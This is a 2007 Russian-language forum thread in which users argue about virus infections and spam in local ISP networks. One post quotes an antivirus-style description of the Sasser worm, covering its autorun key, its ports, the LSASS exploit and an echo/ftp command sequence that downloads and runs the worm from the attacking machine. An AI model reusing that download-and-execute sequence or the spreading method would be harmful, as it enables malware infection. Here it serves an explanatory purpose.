Интернет
#7
Отправлено 22 января 2007 - 19:55
#16
Отправлено 25 января 2007 - 23:05
я специально пошёл купил касперский самый новый, проверил - 0 вирусов!!!MrDron, просто у ламеров часто заводятся вирусы
которые потом рассылают спам через наши сервера. это вычисляется элементарно.
ты можешь и не видеть этого.
Чувака с форума я не стал бы обманывть)) он же может меня потом найти)
#19
Отправлено 25 января 2007 - 23:09
#20
Отправлено 25 января 2007 - 23:10
да сассь был, летом ещё...iliaz, ну да. давно еще походу.
MrDron, ну если это был не вирус, значит просто ты злобный спамер, к примеру.
Все ходы записываются, не думай только что звонящие самые умные а там сплошь идиоты работают
но он был в сети ств!
в сатурне такой каки нету!
Чувака с форума я не стал бы обманывть)) он же может меня потом найти)
#23
Отправлено 25 января 2007 - 23:13
ой в стармане!в сатурне как раз основной рассадник. так как это по сути большая локальная сеть, и в ней куча дебилов без антивирусов и файрволов)
у всех кого знаю летом был сассь в ств
в стармане никто про него и не знал...
Сообщение изменено: MrDron (25 января 2007 - 23:13 )
Чувака с форума я не стал бы обманывть)) он же может меня потом найти)
#25
Отправлено 25 января 2007 - 23:16
если есть
то как ты не крутись, но локалка -куча дебилов без антивирусов и файрволов
ак раз основной рассадник. так как это по сути большая локальная сеть
При запуске червь копирует себя в корневой каталог Windows с именем "avserve.exe" и регистрирует себя в ключе автозапуска: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "avserve.exe" = "%WINDIR%\avserve.exe" Создает в памяти уникальный идентификатор "Jobaka3l" для определения своего присутствия в системе. Запускает FTP службу на порту TCP 5554 и запускает 128 процедур своего размножения. В ходе работы червь пытается вызвать системную процедуру AbortSystemShutdown для запрета перезагрузки системы. Червь запускает процедуры выбора IP-адресов для атаки и отсылает на порт TCP 445 запрос. В случае если удаленный компьютер отвечает на соединение и отправляет эксплоит LSASS, который, используя данную уязвимость, запускает на удаленной машине командную оболочку "cmd.exe" на TCP порту 9996. После этого червь передает на атакуемую машину команды для загрузки и запуска своего тела: echo off echo open [адрес машины с которой производится атака] 5554>>cmd.ftp echo anonymous>>cmd.ftp echo user echo bin>>cmd.ftp echo get [произвольное число]_up.exe>>cmd.ftp echo bye>>cmd.ftp echo on ftp -s:cmd.ftp [произвольное число]_up.exe echo off del cmd.ftp echo on Таким образом один и тот же компьютер может многократно подвергаться атакам и содержать несколько копий червя в виде файлов с именами, например: 23101_up.exe 5409_up.exe и т.д.
так что нет особой роли кто провайдер
локалка есть локалка









